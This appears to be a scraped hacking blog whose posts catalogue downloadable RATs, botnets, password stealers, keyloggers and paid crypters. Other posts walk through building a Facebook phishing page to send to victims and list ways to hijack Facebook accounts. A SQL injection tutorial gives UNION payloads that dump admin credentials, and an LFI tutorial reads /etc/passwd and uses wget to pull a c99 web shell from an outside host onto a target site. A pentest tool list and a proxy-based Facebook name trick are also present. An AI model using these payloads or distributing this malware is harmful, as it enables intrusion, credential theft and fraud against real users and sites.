Rats,Botnets,Stealers All Programs for Hacking

I will not post any cracked version of any rat

I will update this post when new versions come

All files posted here are CLEAN analyzed by me. If you think any file is infected just don't download it, and don't post shit. ALL files are detected by avs, MALWARE always is detected by avs.

Tools marked with [C] you can find free using Google.

If you report any infected file, POST ANY PROOF or you get -rep

If you want your FREE or PAID rat/botnet/crypter/stealer/keylogger/bitcoin miner/ or any malware related posted here, just pm me with your thread link.

Remote Administration Tools - ( RATS )

- Cybergate 1.07.5 - [Image]

- DarkComet 5.3.1.F - [Image]

- Xtreme Rat 2.9 - [Image]

- Pytho Rat 1.5 - [Image]

- nj Rat 0.4.1 - [Image]

- Grimm Rat 1.3 Beta

- Spy-Net 2.6 - [Image]

- Bifrost 1.2.1 d - [Image]

- CyberEye 1.2 - [Image]

- Poison Ivy 2.3.2 - [Image]

- Schwarze Sonne Rat 2.0 Beta 2 - [Image]

- Turkojan 4.0 - [Image]

- Frutas 0.8 ( Java ) - [Image]

- RoyalNET RAT v1.3 - [Image]

- Bozok 1.1 - [Image]

- Adsocks 1.0 Beta ( Java ) - [Image]

- Greame Rat 1.5 Final

- NovaLite 3.0 - [Image]

- jRat 3 ( Java ) - [Image]

- Lost Door v8.0 Pure - [Image]

- Daleth RAT 1.0 - [Image]

- Coolvibes RAT - [Image] - [Pass: Coolvibes]

- DNA Rat - [Image]

- Cerberus 1.03.5 beta - [Image]

- R.A.I.D. - [Image]

- bRAT - Batch RAT

Remote Administration Tools - ( RATS ) - Paid

- Blackshades - BACKDOORED. [C]

- Cybergate Rat - [Image] [C]

- ClientMesh RAT - [Image]

- Emissary Rat

- NetWire RAT - [Image]

- BlackNix RAT - [Image]

- legacyLink - [Image]

HTTP Botnets

- Umbra Loader 1.1.1 - [Image]

- Umbra Loader 1.2.0 (Version by Hermalit) - [Image]

- VertexNet 1.2.1 - [Image]

- µBOT - [Image]

- Elite Loader - [Image]

- Exodus Loader

HTTP Botnets - Paid

- Andromeda - [Image] [C]

- Smoke Loader - [Image] [C]

- Betabot - [Image]

IRC Botnets

- AryaN Builder

IRC Botnets - PAID

Athena IRC

Password Stealers

- ISR Stealer 0.4.1 - [Image]

- Crime24.NET

- aStealer - [Image]

- iStealer 6.3 Legends ( Outdated ) - [Image]

Keyloggers

- Project Neptune 2.0 - [Image]

- Lion Keylogger V1 - [Image]

- HB 1.2.1 Beta

Crypters - Paid

- RazorCrypt2 - [Image] - [AutoIT] [Start at $20]

- Debug Crypter v3 - [Image] - [.NET] [Start at $25]

- Byte Crypter V8 - [Image] - [.NET] [Start at $36]

- Infinity Crypter v4 - [Image] - [.NET] [Start at $20]

- FLUX CRYPTER - [Image] - [.NET] [Start at $15]

- X-Core Crypter - [Image] - [AutoIt] [Start at $20]

- Soft Crypter - [Image] - [.NET] [Start at $50]

Read More

No comments

Hack Facebook using Phishing Technique

MAKING FACEBOOK PHISHING SITE TUTORIAL.

Phishing is the act of attempting to acquire information such as usernames and passwords. phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,and exploits the poor usability of current web security technologies. 


Tutorial:
            Hi Friends I'm again in front of you with easy & complete phishing tutorial, many times phising tricks posted here but almost user says they can't understand so now you can make your phising page eaisly step by step: .This have a great advantage it's a latest FB phising page made by me, reply here if you face any problem Download This Phising Script 
                                               Download


than go to 000webhost.com   and choose free account option

now you click on free domain

              In registration choose pass with combination of capital , small alphabets & numbers.

              after registration verify your account by email.

Now you can see your control panel (refesh page if required), goto control panel

click on File Manager

you can see a page for upload your file (Don't upload file here , it's must be upload on public directry according to below image)

Upload your facebook page in .zip format

now you can see your file below like this

Thats all... 

 Now Your Phishing fb page is  YourDomain.com/index.html 

index.html is your phishing page.

 Now you can send this page to your victimes, When your Victime login this fake page their login and pass store in your hosting directry  lol.txt  like below

Note: This default fb phising page redirect on www.google.com  you can cange by editing hello.php in download fb phishing.zip pack
..This tutorial only for educational purpose for prevent you from hackers, applying this technique may be considerd as crime..

Read More

No comments

Top Ways to Hack Facebook Accounts

Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Top 10 ways to hack facebook accounts

8 Way To Hack Facebook 

1. Facebook Phishing 

Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.

I have explained the step by step phishing process in my post below:

                     

How To Hack Facebook Password

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. 

I have explained the step by step process in my post 

How To Hack Facebook With keylogging

3. Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.

Further Information

• Gmail Cookie Stealing And Session Hijacking Part 
• Gmail Cookie Stealing And Session Hijacking Part 2
• Gmail Cookie Stealing And Session Hijacking Part 3
• Facebook Session Hijacking Attack(Recommended)

4. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.

To know more about sidejacking attack and firesheep, read the post mentioned below:

Firesheep Makes Facebook Hacking Easy

5. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.

The most popular Mobile Phone Spying softwares are:

1. Mobile Spy 

6. DNS Spoofing 

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.

Click Here To Watch Facebook Hacking With DNS Spoofing(Video TuT)

7. USB Hacking 

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the browser, I have also posted related to this attack which you can read by accessing the link below:

• Usb password stealer To Hack Facebook Passwords

8. Man In the Middle Attacks

If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article, We have written a couple of articles on man in the middle attacks which canb be accessed from the links mentioned below:

• Man In the Middle Attacks With SSL Strip

If you are really interested in learning how man in the middle attacks, you can view the presentation 

Here......

Read More

1 comment

Security Pentesting Tools

Here is a compilassstion of multiple forensic and penetration testing tools for applications, networks, and websites.

Nmap
Nmap is a very versatile tool developed to scan addresses (IPV6 included), this tool allows the users to gather a mass amount of information about the target quickly, information including open ports, + much, much more.
Nmap supports a large number of scanning techniques such as: UDP, TCP connect(), TCP SYN (half open), ftp proxy (bounce attack), ICMP (ping sweep), FIN, ACK sweep, Xmas Tree, SYN sweep, IP Protocol, and Null scan.

Wireshark

A very powerful network troubleshooting and analysis tool,
Wire shark provides the ability to view data from a live network, and supports hundreds of protocols and media formats.

Cain & Abel

Cain and Abel is a revolutionary tool that provides many functions that are able to do various password retrieval jobs, cracking passwords, sniffing networks, and routing/analyzing protocols. This tool is Windows-only, unlike many other tools that exist, this is a pleasant twist to modern penetration testing and forensic tools.

MetaSploit

MetaSploit, a very powerful network security and analysis tool, used often for penetration attacks, this tool has a clean interface and easily gathers the information that you seek.

Ettercap

Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. (Taken from their website)

Nessus

The Nessus tool provides high-speed data discovery, asset profiling, configuration auditing, and vulnerability analysis of networks.

Havij

Havij is the most common and heard of testing tool for SQLI injection and many other web-based injection types. It fluently provides the site's scan, admin look-up, password cracking, and database retrieval. It literally makes it a breeze to hack, and find, vulnerable websites.

Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT. (Taken from Kismet website)

BackTrack Linux

Back Track is a widely popular bootable Live-CD of a Linux Distro. Back Track offers a vast variety of penetration testing tools, along with those for network attacks, and supports many other forms of testing/attacking, for VOIP networks, Websites + more. The tool's interface and design provides an easy to use layout.

w3af

W3af is an extremely popular, powerful, and flexible framework for finding and exploiting web application vulnerabilities. It is easy to use and extend and features dozens of web assessment and exploitation-plugins. In some ways it is like a web-focused Metasploit. (Taken from nmap.org)

Encase

EnCase is a suite of computer forensics software, commonly used by law enforcement. Its wide use has made it a de-facto standard in forensics. It is made to collect data from a computer in a forensically sound manner (employing checksums to help detect tampering). (Taken from Nmap.org.)

Helix

Helix is a live bootable Ubuntu CD, that contains a multitude of forensic tools involving cellphones, computers, file systems, images, and tied into its sheer power is a friendly and easy-to-use interface.

Acunetix

Acunetix is a strong, and very popular website security tool. It provides many tools to test your website, (or others) for various injections. Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. (Taken from http://portswigger.net/burp/)

Read More

No comments

Hacking Website using SQL STRING INJECTION

What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:

Code:

"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)

---

---

---

Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi

Code:

http://site.com/index.php?id=10' order by 1000--+

That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query

Code:

id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we

---

---

String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)

Code:

http://www.site.com/index.php?id=234' order by 11--+

Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+

Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+

Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names

Code:

http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based

---

---

---

This will be considered as a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they're on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi

Read More

No comments

LFI Exploitation Shell Uploading

Hey guys,
Today I'll be explaining how to shell a website using "php://input" method via LFI.

So let's get started.
Now let's have our target shall we. As an example, your target URL should look like this:

Code:

http://www.site.com/index.php?page=

You can have anything similar to that as long as you can be able to read files and obtain an "include" error.

First things first, give it a shot and see if you can read "/etc/passwd"

URL will look like:

Code:

http://www.site.com/index.php?page=/etc/passwd

If successful, you'll be having a page that looks like this:

Click this bar to view the original image of 667x422px.

Now lets try reading:

Code:

/proc/self/environ
/proc/self/fd

So URL will become:

Code:

http://www.site.com/index.php?page=/proc/self/environ
http://www.site.com/index.php?page=/proc/self/fd

Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.

Click this bar to view the original image of 651x389px.

Well, not to worry, it's time to use our back up method. The "php://input" method will help us read files with certain commands, hence enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers"

I'll show you how to exploit via php://input using the "Hackbar"

So lets check what we're supposed to use in the Hackbar

Click this bar to view the original image of 686x190px.

Now let's try putting this method in action.
Look at the picture carefully.

Click this bar to view the original image of 800x325px.

URL will be:

Code:

http://www.site.com/index.php?page=php://input

and POST DATA:

Code:

<? system('uname -a'); ?>

Other commands
List directories

Code:

 <? system('ls'); ?>

Identification

Code:

<? system('id'); ?>

Convert format

Code:

<? system('mv file.txt file.php'); ?>

Alright, let's spawn a shell there now shall we.

Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell

Code:

http://www.sh3ll.org/c99.txt?

Let's use the "wget" command to spawn our shell on the site.

So our POST DATA will be:

Code:

<? system('wget http://www.sh3ll.org/c99.txt -O nameofshell.php');?>

This is how it's gonna look like.

Click this bar to view the original image of 680x173px.

Now that you've spawn a shell, you can now navigate to your shell on the site.

Code:

http://www.site.com/shell.php

You can watch a video tutorial below so that it'll be easier to understand.
Have fun.

Team Intra

If you need any help, feel free to ask me.

Read More

No comments

First Name Only Facebook Trick

How to Have a first name only on Facebook Guide.

STEP 1
Open Firefox:

Spoiler (Click to Hide)

STEP 2
Go to - Settings:

Spoiler (Click to Hide)

Advanced and finally Network. Click on settings and click on [b]Manual proxy configuration[/b].

Next to Http: and Port: write any of the following:
Note: If one of them doesn't work try the next one.

Spoiler (Click to Hide)

Code:

202.43.188.7 and for Port: 8080.
  202.43.93.51 and for Port: 3128.
  115.124.72.62 and for Port: 3128.
  202.43.188.15 and for Port: 8080.
  118.97.20.221 and for Port: 3128.
  175.45.187.121 and for Port: 8080.
  202.152.156.212 and for Port: 8080.
  202.43.93.55 and for Port: 3128.
  118.98.35.251 and for Port: 8080.
  202.43.93.60 and for Port: 3128.
  103.5.48.198 and for Port: 8080.
  202.43.93.9 and for Port: 3128.
  103.247.16.129 and for Port: 8080.
  202.43.93.58 and for Port: 3128.

After that tick the checkbox: Use this proxy server for all protocols. And finally click Okay:

Spoiler (Click to Hide)

STEP 3
Go to: https://www.facebook.com/

Login with your Email/Password.
Note: Your account may be locked due to using
a proxy! This is can be easily fixed by going through the indentification
process.

Click on Menu located at the right top corner,
Select account settings:

Spoiler (Click to Hide)

Click edit your language,
Change it to: Bahasa Indonesian and finally click Save changes:

Spoiler (Click to Hide)

Then edit your name,
Remove the last name and hit Simpan Perubahan to save changes:

Spoiler (Click to Hide)

After that click on Bahasa to change the language
back to English and click on Simpan Perubahan:

Spoiler (Click to Hide)

And finally click on top right menu and
hit: Logout to log you out safely:

Spoiler (Click to Hide)

After that head over to: Firefox - Options:

Spoiler (Click to Hide)

Followed by: Advanced - Network
and finally Settings again, Remove the proxies and click on:
No Proxy to go out of proxy for faster surfing experience! and
click Okay:

Spoiler (Click to Hide)

I am not the owner of this tutorial so all credit goes to
whom ever figured this. I'm just re presenting it for educational
purposes and through a easier way to follow.

Enjoy and hope you found this much easier to follow.
If you require any help then post below.

Read More

No comments